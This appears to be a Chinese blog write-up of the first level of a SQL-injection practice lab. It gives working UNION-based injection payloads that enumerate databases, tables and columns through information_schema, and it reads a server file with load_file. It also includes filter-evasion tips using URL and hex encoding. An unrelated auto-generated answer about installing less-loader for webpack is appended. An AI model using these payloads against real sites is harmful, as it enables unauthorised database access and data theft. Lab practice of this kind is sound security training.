Mituan Less-1

第一关:

 点击后出现以下界面:

 如未出现Your Login name:

                You Password:

则在网址中app.后加入

 mituan.zone/Less-1/?id=1

 推荐HackBar插件可以更加直观的编写代码执行

试一下参数

输入'

发现无返回数据说明‘进入了select查询语句(发现注入点)

利用 order by 语句排列发现排列4列时报错得出只有3列

1' order by 3%23

 注:在网页中空格是%20,单引号是%27, 井号是%23,双引号是%22有时网页会屏蔽特殊字符

得到了列数我们即可用union联合查询查出我们想要的数据

Select user()-------获得当前登陆账号
Select version() ---获得数据库版本
Select database()---获得当前数据库
@@datadir----(数据库的存储路径)
@@hostname----(数据库主机名)
@@VERSION-----(数据库版本号)
@@Version_compile_os-----(数据库的操作系统版本)
' union select null,load_file('c:/windows/win.ini')------(读取文件)
concat_ws(char(32,58,32),1,2,3)-------连接字符串

 例如:搜索当前登录账号以及数据库版本号

-1'  union select 1,user(),version()%23

使用mysql的数据库information_schema, 里面记录所有数据库名,数据库的表,列的数据类型等

-1' union select 1,2,table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1%23

注:我们通常将数据库名,表名转换成16进制防止网页报错或拦截

-1' union select 1,1,column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273  limit 1,1 %23

 

 MySql拼接语句(group_concat)

group_concat([DISTINCT] 要连接的字段 [Order BY ASC/DESC 排序字段] [separator '分隔符'])

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
安装less-loader和less的步骤如下: 1. 确定你正在使用的webpack版本。根据webpack的版本选择合适的less-loader版本。例如,如果你使用的是webpack@4,那么可以选择less-loader@5~7版本。 2. 打开命令行终端,运行以下命令来安装less-loader: ``` npm install less-loader@7 --save-dev ``` 3. 确保你已经安装了webpack和webpack-cli。如果还没有安装,请运行以下命令来安装它们: ``` npm install webpack webpack-cli --save-dev ``` 4. 在webpack配置文件(通常是webpack.config.js)中添加less-loader的配置。参考以下示例: ``` module.exports = { // ... module: { rules: [ { test: /.less$/, use: [ { loader: "style-loader" }, { loader: "css-loader" }, { loader: "less-loader", options: { strictMath: true, noIeCompat: true } } ] } ] } }; ``` 5. 在需要使用less语法的样式文件中,将style节点的lang属性设置为'less'。例如: ```html <style lang="less" scoped> /* 样式内容 */ </style> ``` 总结:按照以下步骤安装less-loader和less: 1. 确定webpack的版本,选择合适的less-loader版本; 2. 使用npm命令安装less-loader,例如:npm install less-loader@7 --save-dev; 3. 确保已安装webpack和webpack-cli,如果没有请使用npm install webpack webpack-cli --save-dev安装; 4. 在webpack配置文件中添加less-loader的配置; 5. 在需要使用less语法的样式文件中,将style节点的lang属性设置为'less'。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值